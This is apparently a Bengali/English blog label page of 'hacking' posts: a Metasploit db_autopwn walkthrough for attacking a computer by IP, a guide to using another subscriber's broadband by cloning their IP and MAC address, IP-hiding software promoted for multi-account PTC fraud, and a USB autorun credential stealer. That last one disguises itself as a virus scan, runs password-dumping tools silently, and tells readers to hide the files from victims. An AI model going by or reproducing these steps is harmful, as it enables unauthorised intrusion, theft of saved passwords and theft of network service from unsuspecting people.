হ্যাকিং লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান
হ্যাকিং লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান

How To hack Computer With Only An IP aDdreSS xD

Hello everybody! I am here to show you this magical tool called Metasploit that allows you to hack any unpatched computer with only it's IP. Let's begin.

First you need to download Metasploit. The most up-to-date version is free at


Metasploit

You need PostgrSQL for your database. Download from :-   PostgresqlMake sure you use all the defaults or Metasploit won't work!

Now lets get down to buisness. After installing both tools, open up the PostgrSQL admin gui. Then right-click on your Server (in the left hand box) and click Connect. Remember to keep this window open the whole time. You will also need the pass you chose

Time for some hacking! Go to Start => All Programs => Metasploit Framework, and then open it. Let it load untill it look like this:
Now, in the window type:
db_connect postgres:ThePassYouChose@localhost:5432 
The first time you do this you will see lots of text flash buy. Don't worry, this is normal.
Type db_host to make sure you are connected correctally.
Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000.
Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, it will take some time try to listen any good song.
After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
Now we get to use the exploits to hack the computer. In order to use an exploit, type this:
sessions -i exploit_number

ব্রডব্যন্ড হ্যাক করে ব্যবহার করুন

আমরা অনেকেই ব্রন্ডব্যান্ড-এর লাইনে ইন্টারনেট চালাই। কিন্তু সেই ব্রডব্যান্ডের যদি স্পিড কম হয় তাহলে কার না খারাপ লাগে? আমার নিজেরও খারাপ লাগে। তাই আজ আপনাদের জন্য নিয়ে এলাম ব্রডব্যান্ডের হ্যাকিং সফটওয়্যার। তাহলে এখুনি ডাউনলোড করে নিন মিডিয়া আগুন থেকে (Direct Link)

চলুন দেখে নেই, কীভাবে আপনার ব্রডব্যান্ড হ্যাক করবেন?
  1. প্রথমে আপনাকে উপরের ডাউনলোডকৃত ফাইলটি আনজিপ করতে হবে। আনজিপ করার জন্য যেকেনো আনজিপ সফটওয়্যার ব্যবহার করতে পারেন। অথবা এখান থেকে 7Zip সফটওয়্যারটি নামিয়ে নিন। (ব্রডব্যান্ড হ্যাকিং এর সফটওয়্যারটি আনজিপ করার সময় পাসওয়ার্ড হিসেবে “technoworldbd”) দিয়ে দিবেন।)
  2. তারপর আনজিপ করা ফাইলটি ইন্সটল দিন। ইন্সটল শেষ হলে সফটওয়্যারটি চালু করুন।
  3. তারপর নিচের ছবির মতো “C” তে ক্লিক করে Scan এ ক্লিক করুন। দেখুন আপনার আইপি খোঁজা শুরু হয়ে গেছে।
  4. আইপি খোঁজা শেষ হলে সেখান থেকে যে আইপি আপনি ব্যবহার করতে চান, সেটি সিলেক্ট করুন। তারপর আপনার মাউসের ডান বোতামে ক্লিক করে Copy–>>IP এবং MAC address এই দুইটি কপি করে সংরক্ষন করে রাখুন। (বি:দ্র: আপনার নিজের IP এবং MAC address কিন্তু অবশ্যই সংরক্ষনে রাখবেন।)
  5. তারপর আপনার Local Area Network এর Properties এ যান। তারপর ডায়লগ বক্স থেকে Configure সিলেক্ট করে Advance ট্যাব থেকে Network Address এ ক্লিক করুন। তারপর ডানদিকের খালি ঘরে আপনার সংরক্ষিত MAC address টি বসিয়ে দিন এবং OK ক্লিক করে বের হয়ে আসুন।
  6. তারপর আবার একই ভাবে আপনার Local Area Network এর Properties এ যান। তারপর “Internet Protocol (TCP/IP)” [Windows XP] এবং “Internet Protocol Version 4 (TCP/IPv4)” [Windows 7 or 8] গিয়ে আপনার ব্রডব্যান্ড লাইনের প্রয়োজনীয় “Subnet Mask, Default Gateway, Preferred DNS server, Alternate DNS server” তথ্যগুলো দিয়ে দিন। আর IP address এর জায়গায় আপনার সংরক্ষিত IP address টি দিয়ে দিন।
  7. তারপর আপনার Local Area Network টি Disable করে পুনরায় Enable করুন। দেখুন আপনি এখন অন্যের আইপি নিজের কম্পিউটারে চালাতে পারবেন।
ঠিক একই পদ্ধতিতে আপনার আইপি তে যদি ইন্টারনেট কানেকশন বন্ধ করা থাকে তাও আপনি অন্যের আইপি দিয়ে সেটি চালাতে পারবেন।
বি:দ্র: উপর্যুক্ত হ্যাকিং সম্পূর্ণ নিজ দায়িত্বে করবেন। ghuri-firi এর কোনো প্রকার দায়ভার গ্রহণ করবে না।

Ip hide সফটওয়্যার

 হাজির হলাম Ip hide সফটওয়্যার নিয়ে।হ্যাকার বন্ধু ও আরো যারা ptc সাইট করেন তাদের কাজে লাগতে পারে।কারন অনেক ptc সাইট একটা Ip তে একটা account খোলা য়ায তাই এই সফটওয়্যার দিয়ে একাধিক account খুলতে পারবেন। বিস্তারিত বলি, এই সফটওয়্যার দিয়ে এ আপনি আপনার Ip hide করতে পারবেন খুব সহজে খুব সহজ করে দেয়া আসে।সফটওয়্যারটা ডাউনলোড করে দেখুন খুব সহজে Ip hide করতে পারছেন। সফটওয়্যারটি মাত্র ৫.৮৯ mb।আরও বিস্তারিত দেখুন
সফটওয়্যারের নামঃ Real Hide IP 4.2.4.2

ডাউনলোডঃhttps://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibSfDQCCtARg7PJ6zVGcjgBFmTnwUn2gkIREHXd40X6Gs6YZrllF70w1yIHkd-OR9fmtMBECwDofscli4aSOkniW5g860vsZzBybrOi0C1sD7mHUUjmM4rYmm1muypSecLjFcGUiI7jGlU/s1600/1696-Hide_IP_Easy.jpg

CLICK HERE

CLICK HERE

CLICK HERE

হ্যাকিং বিষয়ে চুলকানি থাকলে দূরে থাকুন।

আজকাল সবার কাছেই পেনড্রাইভ আছে বলা যায়। একজনের পিসি থেকে আরেক জনের পিসিতে অবাধে বিচরন করছে এই পেনড্রাইভ। আর এই পেনড্রাইভকেই ব্যবহার করতে পারেন হ্যাকিং এর ছোট হাতিয়ার হিসেবে। শুধু পেনড্রাইভই নয় মেমরি কার্ড দিয়েও একই কাজ করা সম্ভব! তাহলে চলুন শুরু করা যাক।


xclUsivE         posT                       frOM                            PrincEO

প্রথমে দুইটা ফাইল বানাতে হবে। নাম ধরেন AUTORUN এবং LAUNCH।
একটা নোট প্যাড খুলুন। তারপর টাইপ করুন

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

এখন সেভ করুন AUTORUN.inf নামে।

আবার নোট প্যাড খুলুন। তারপর টাইপ করুন

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

এখন সেভ করুন LAUNCH.bat নামে। আপনি আপনার মতো কাস্টোমাইজও করে নিতে পারেন।

এখন এই সাইটে যান।
এখানে থেকে আপনার প্রয়োজনীয় সফটওয়্যার ডাউনলোড করে নিতে পারেন।

এত ঝামেলা না করতে চাইলে সরাসরি এখান থেকে এই ফাইলটি ডাউনলোড করে নিন। তারপর Extract করে ফোল্ডারের সব ফাইলগুলো আপনার পেনড্রাইভে কপি করুন। বলা যায় আপনার কাজ শেষ।

এখন এই পেনড্রাইভ যে কারও পিসিতে প্রবেশ করালেই পেয়ে যাবেন সব সেভ করা পাসওয়ার্ড!
**শর্ত প্রযোজ্য

যার পিসিতে প্রবেশ করাবেন তার AUTORUN অফ করা থাকলে সরাসরি কাজ করবে না। তবে আপনি যদি সুযোগ বুঝে LAUNCH নামক ফাইলটি ডাবল ক্লিক করে ওপেন করে ফেলেন তাহলেই কেল্লা ফতে! আর যদি AUTORUN অফ না করা থাকে তাহলেতো আর কিছুই করা লাগবে না। অটো সব পাসওয়ার্ড হ্যাক হয়ে যাবে।
আর মজার কথা হলো AUTORUN ফাইলটা ছাড়া আর কোন ফাইল এন্টিভাইরাস ধরতে পারবে না। তাই নির্ভয়ে হ্যাক চালিয়ে যেতে পারবেন।

কিভাবে হ্যাক করা পাসওয়ার্ডগুলো দেখবেন? খুব সহজ! আপনার পেনড্রাইভ ফোল্ডারে দেখুন
WebBrowserPassView নামসহ কিছু টেক্সট ফাইল তৈরি হয়েছে। সব পাসওয়ার্ড এই টেক্সট ফাইলেই পাবেন। এভাবে আপনি Internet Explorer, Mozilla Firefox (All Versions), Google Chrome, and Opera এর সব সেভ করা পাসওয়ার্ড হাতিয়ে নিতে পারবেন। :mrgreen:

**সতর্কতা স্বরুপ আপনি ফাইলগুলো হিডেন করে রাখতে পারেন। যাতে ভিক্টিম বুঝতে না পারে।** 

কিভাবে বাচবেন এমন হ্যাকারের হাত থেকে? তেমন কিছু না।
AUTORUN অফ করে রাখুন+ মাস্টার পাসওয়ার্ড ব্যবহার করুন। মজিলার Tools -> Options -> Security / Passwords -> Use a master password কাজ শেষ!

আশা করি আপনাদের ভাল লেগেছে।
ধন্যবাদ সবাইকে।